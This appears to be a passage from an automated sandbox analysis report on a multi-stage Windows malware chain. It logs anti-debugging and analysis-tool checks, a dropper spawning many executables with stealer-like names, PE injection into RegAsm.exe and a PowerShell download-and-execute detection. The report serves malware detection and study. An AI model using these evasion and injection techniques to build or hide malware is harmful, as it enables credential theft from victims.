                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeProcess queried: DebugPort
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeProcess queried: DebugPort
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                                    Source: C:\Users\user\Desktop\file.exeCode function: 6_2_04B20892 rdtsc 6_2_04B20892
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E6EAA2 BlockInput,17_2_00E6EAA2
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00E22622
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00DF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,17_2_00DF42DE
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DE652B mov eax, dword ptr fs:[00000030h]11_2_00DE652B
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DEA302 mov eax, dword ptr fs:[00000030h]11_2_00DEA302
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E14CE8 mov eax, dword ptr fs:[00000030h]17_2_00E14CE8
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,17_2_00E50B62
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00E22622
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E1083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00E1083F
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E109D5 SetUnhandledExceptionFilter,17_2_00E109D5
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E10C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00E10C21
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeMemory protected: page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Yara detected Powershell download and execute
                                    Source: Yara matchFile source: Process Memory Space: 3ec4738210.exe PID: 7672, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: b74664dd7e.exe PID: 7812, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 3ec4738210.exe PID: 8032, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: b74664dd7e.exe PID: 6220, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 3ec4738210.exe PID: 1964, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: b74664dd7e.exe PID: 4500, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
                                    Allocates memory in foreign processes
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                                    Injects a PE file into a foreign processes
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                                    Writes to foreign memory regions
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11C9008
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,17_2_00E51201
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E32BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,17_2_00E32BA5
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E5B226 SendInput,keybd_event,17_2_00E5B226
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E722DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,17_2_00E722DA
                                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe "C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe "C:\Users\user~1\AppData\Local\Temp\1000020001\610cd559ac.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1500
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,17_2_00E50B62
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E51663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,17_2_00E51663
                                    Source: 6dbb7bdf47.exe, 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                                    Source: 610cd559ac.exe, 00000017.00000002.1925800293.00000000002C7000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000001E.00000002.2132470918.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000029.00000002.2741698869.00000000008D7000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: BProgram Manager
                                    Source: 6dbb7bdf47.exeBinary or memory string: Shell_TrayWnd
                                    Source: 3ec4738210.exe, 3ec4738210.exe, 0000000D.00000002.1975346461.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, b74664dd7e.exe, b74664dd7e.exe, 0000000E.00000002.2584529637.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, b74664dd7e.exe, 0000001D.00000002.2791005796.0000000000928000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 9Program Manager
                                    Source: skotes.exe, skotes.exe, 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: .vProgram Manager
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DCD3E2 cpuid 11_2_00DCD3E2
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\1000015002\b74664dd7e.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\1000015002\b74664dd7e.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\1000018042\blo.ps1 VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000285001\2.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000285001\2.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000308001\4d72d15151.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000308001\4d72d15151.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000321001\2.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000321001\2.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DCCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,11_2_00DCCBEA
